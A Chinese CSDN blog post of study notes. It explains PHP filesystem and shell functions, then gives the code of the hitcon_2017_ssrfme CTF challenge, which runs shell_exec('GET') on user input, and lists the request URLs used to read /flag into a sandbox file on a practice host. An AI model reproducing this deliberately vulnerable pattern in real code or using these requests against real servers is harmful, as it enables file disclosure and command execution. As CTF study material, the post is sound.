end的学习 21-4-20

最新推荐文章于 2023-06-25 18:24:56 发布
最新推荐文章于 2023-06-25 18:24:56 发布
阅读量144 收藏
点赞数
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45781155/article/details/115918165
版权

mkdir

创建权限为777的目录:mkdir -m 777 test3

通过 mkdir 命令可以实现在指定位置创建以 DirName(指定的文件名)命名的文件夹或目录。要创建文件夹或目录的用户必须对所创建的文件夹的父文件夹具有写权限。并且,所创建的文件夹(目录)不能与其父目录(即父文件夹)中的文件名重名,即同一个目录下不能有同名的(区分大小写)。

chdir()
chdir() 函数改变当前的目录。

<?php
// Get current directory
echo getcwd() . "<br>";// /home/php

// Change directory
chdir("images");

// Get current directory
echo getcwd();//  /home/php/images 
?>

shell_exec
shell_exec — 通过 shell 环境执行命令,并且将完整的输出以字符串的方式返回。

 shell_exec ( string $cmd ) : string  //cmd 要执行的命令

escapeshellarg
escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数

 escapeshellarg ( string $arg ) : string//escapeshellarg() 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,并且还是确保安全的。对于用户输入的部分参数就应该使用这个函数。shell 函数包含 exec(), system() 执行运算符 。

pathinfo() 函数
pathinfo() 函数以数组的形式返回文件路径的信息。

pathinfo(path,options)

basename函数
basename() 函数返回路径中的文件名部分。

basename(path,suffix)

参数 描述
path 必需。规定要检查的路径。
suffix 可选。规定文件扩展名。 有suffix,则不会输出这个扩展名。

file_put_contents
file_put_contents — 将一个字符串写入文件

 file_put_contents ( string $filename , mixed $data , int $flags = 0 , resource $context = ? ) : int

filename:
要被写入数据的文件名。
data:
要写入的数据。类型可以是 string,array 或者是 stream 资源(如上面所说的那样)。如果 data 指定为 stream 资源,这里 stream 中所保存的缓存数据将被写入到指定文件中,这种用法就相似于使用 stream_copy_to_stream() 函数。
参数 data 可以是数组(但不能为多维数组),这就相当于 file_put_contents($filename, join(’’, $array))。
flags:
flags 的值可以是 以下 flag 使用 OR (|) 运算符进行的组合。

题目:

<?php 
    $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]); 
    @mkdir($sandbox); 
    @chdir($sandbox); 

    $data = shell_exec("GET " . escapeshellarg($_GET["url"])); 
    $info = pathinfo($_GET["filename"]); 
    $dir  = str_replace(".", "", basename($info["dirname"])); 
    @mkdir($dir); 
    @chdir($dir); 
    @file_put_contents(basename($info["basename"]), $data); 
    highlight_file(__FILE__);

http://www.bmzclub.cn:20431/sandbox/edce46c67c1141eb10f7102c087bd736

http://www.bmzclub.cn:20431/sandbox/?url=/&filename=aaa

http://www.bmzclub.cn:20431/sandbox/edce46c67c1141eb10f7102c087bd736/aaa

http://www.bmzclub.cn:20431/?url=/flag&filename=flag.txt
http://www.bmzclub.cn:20431/sandbox/edce46c67c1141eb10f7102c087bd736/flag.txt

在这里插入图片描述

闲人end
关注
专栏目录
艺博: linux命令大宝典系列之mkdir创建目录
艺博❀
07-16 870
在成长的过程中,人总要经历一些痛苦和挫折才能更加成熟与坚强 目录mkdir是什么mkdir的语法mkdir的选项含义mkdir的实例1. 使用mkdir命令创建一个dir1目录(默认权限775)2. 使用mkdir -m命令新建一个dir2目录,权限设置为7773. 使用mkdir -p 命令创建多个目录 mkdir是什么 mkdir可以在Linux系统上创建目录 mkdir的语法 mkd...
论文:TransVG: End-to-End Visual Grounding with Transformers
m0_38064230的博客
11-02 3213
作者 Abstract 在本文中,我们提出了一个简洁而有效的基于转换的视觉基础框架,即TransVG,以解决将语言查询与图像上相应区域的基础任务。最先进的方法,包括两阶段或一阶段的方法,依赖于一个复杂的模块和手动设计的机制来执行查询推理和多模式融合。然而,在融合模块设计中,由于查询分解和图像场景图等机制的参与,使得模型很容易过度适应特定场景的数据集,限制了视觉语言环境之间的充分交互。为了避免这种警告,我们建议通过利用Transformer建立多模态对应关系,并通过经验证明,复杂的融合模块(例如,模块化注意
mkdir -m 777 tt 创建777属性的文件
djojun1140的博客
03-06 2482
mkdir -m 777 tt 创建777属性的文件 转载于:https://www.cnblogs.com/todayORtomorrow/p/10486514.html
Shell 命令集合 磁盘管理 】Linux 创建目录 mkdir 命令使用指南
最新发布
探索C++编程的奥秘,分享深入的技术见解和实践,旨在激发读者创造力与解决问题的思维。
06-25 8651
mkdir命令是Linux系统中的一个用于创建目录的命令。它的作用是在指定的路径下创建一个新的目录。 使用mkdir命令可以方便地创建一个空的目录,该目录可以用于存储文件或其他目录。通过指定路径参数,可以在当前工作目录或其他指定目录下创建新的目录。
i春秋CTF ssrfme (peal函数中get命令漏洞)命令执行 详细题解+原理 学习过程
AAAAAAAAAAAA66的博客
12-16 1595
前几天刚做一道命令执行的题目累的够呛,这会刷题又碰见一道,所以做个总结,梳理一下自己学到的各方面知识。 题目 分析 <?php $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]); @mkdir($sandbox); @chdir($sandbox); $data = shell_exec("GET " . escapeshellarg($_GET["url"]));
关于BMZCTF hitcon_2017_ssrfme的解法
永远是少年
01-12 887
在BMZCTF中,有一道题是hitcon_2017_ssrfme
Sparse R-CNN: End-to-End Object Detection with Learnable Proposals论文翻译
Q1u1NG的博客
12-04 1165
Sparse R-CNN: End-to-End Object Detection with Learnable Proposals论文翻译摘要 论文地址:Sparse R-CNN: End-to-End Object Detection with Learnable Proposals 代码地址:https://github.com/PeizeSun/SparseR-CNN 摘要 我们提出了Sparse R-CNN,一种纯稀疏的方法用于图像中的目标检测。现有的目标检测工作很大程度上依赖于密集候选目标,如在
Towards End-to-end Text Spotting with Convolutional Recurrent Neural Networks
qq_27009517的博客
10-12 1542
文章目录Abstract1. Introduction2. Related Work2.1. Text Detection2.2. Text Recognition2.3. Text Spotting Systems3. Model3.1. Overall Architecture3.2. Text Proposal Network3.3. Region Feature Encoder3.4. T...
论文中文解读 End-to-End Multimodal Emotion Recognition using Deep Neural Networks 基于深度神经网络的端到端多模态情感识别
mengmeng19870109的博客
01-14 1481
论文解读 End-to-End Multimodal Emotion Recognition using Deep Neural Networks 基于深度神经网络的端到端多模态情感识别 摘要:我们提出了一种使用听觉和视觉方式的情绪识别系统。我们利用卷积神经网络(CNN)从语音中提取特征,而对于视觉模态,则使用50层的深度残差网络(ResNet)。其中特征提取要鲁棒,机器学习算法要对异常值不敏感,同时能够对上下文进行建模。利用了长期短期记忆(LSTM)网络。通过利用每个流的相关性,以端到端的方式对系统进行训
记忆网络之End-To-End Memory Networks
呜呜哈的博客
09-26 3735
记忆网络之End-To-End Memory Networks这是Facebook AI在Memory networks之后提出的一个更加完善的模型,前文中我们已经说到,其I和G模块并未进行复杂操作,只是将原始文本进行向量化并保存,没有对输入文本进行适当的修改就直接保存为memory。而O和R模块承担了主要的任务,但是从最终的目标函数可以看出,在O和R部分都需要监督,也就是我们需要知道O选择的相关记
Linux:设置文件夹权限之777的含义
热门推荐
薄荷的博客
11-21 1万+
今天面试的时候一不小心就给自己挖坑了,说使用过的Linux命令时,我说了一个mkdir -m 777文件夹名称——创建文件夹及授予权限,然后就被问: 为什么mkdir -m 777文件夹名称授予文件夹权限要用777? 在linux系统中,文件或目录的权限可以分为3种: R: 4 可读 W:2可写 X:1 执行 -:对应数值0 数字 4 、2 和 1表示读、写、执行权限 rwx = 4 + 2 + 1 = 7 (可读写运行) rw = 4 + 2 = 6 (可读写不可运行) ...
5位可控字符下的命令执行
qq_45521281的博客
05-03 1715
遇到了这样一个题,这题是一个特别的命令执行题, 首先进去首页之后发现以下源码: <?php $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']); @mkdir($sandbox); @chdir($sandbox); if (isset($_GET['cmd']) &...
hitcon_2017_ssrfme
o3Ev的博客
05-02 408
hitcon_2017_ssrfme 题目: 打开环境,得到: <?php $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]); @mkdir($sandbox); @chdir($sandbox); $data = shell_exec("GET " . escapeshellarg($_GET["url"])); $info = pathinfo($_GET["file
命令注入突破长度限制 | 从CTF题目讲起
纸房子
12-03 7125
在命令注入中往往会存在注入命令的长度过短的情况,无法将全部命令完全的输入进去,这种情况下就需要我们来想办法突破系统命令长度的限制。我们从三道CTF题目来讲解一下这种渗透策略。一.BabyfirstSovled: 33 / 969 Difficulty: ★★ Tag: WhiteBox, PHP, Command InjectionIdeaUse NewLine to bypass regula
php如何打网页ctf,【CTF 攻略】如何绕过四个字符限制getshell
weixin_28729331的博客
03-17 703
预估稿费:400RMB投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿前言本文主要整理如何巧用Linux命令绕过命令注入点的字符数量限制,内容围绕HITCON CTF 2017 的两道题展开,先讲五个字符的限制,再讲四个字符的。在此感谢下主办方分享这么有趣的点子。热身问题的起源是 HITCON CTF 2017 的 BabyFirst Revenge 题,题目的主要代码如下:B...
HITCON2017-Web-writeup
无节操
10-27 1848
HITCON2017-Web-writeupProblemsbabyfirst-revenge Problems babyfirst-revenge Description: <?php $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']); @mkdir($sandbox); @ch...
(4)5位可控字符下的任意命令执行-----另一种解题方法
大方子
11-06 3321
有道分享链接:https://note.youdao.com/ynoteshare1/index.html?id=55e53db4f857d81515e57e104777b88b&type=note 前言: 题目是hitcon-ctf-2017的babyfirst-revenge,之前是针对babyfirst-revenge-v2来进行学习研究的 <?php ...
[HITCON 2017]SSRFme
K1ose的博客
03-24 215
访问页面,代码审计; <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_ADDR'] = $http_x_headers[0]; } echo $_SERVER["REMOTE_ADDR"]; $sandbox =
[HITCON 2017]SSRFme(perl脚本中get命令执行漏洞)
记录学习,一起进步
01-28 957
[HITCON 2017]SSRFme(perl脚本中get命令执行漏洞)
CEC-I中华学习机操作与CEC-BASIC编程指南
"这篇文档是关于泰和安火灾报警系统及中华学习机CEC-I的用户手册,涵盖了系统和实用命令的详细说明,以及CEC-I的学习机硬件、软件的使用和操作方法。" 在"系统和实用命令-泰和安火灾报警系统说明书"中,描述了多个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值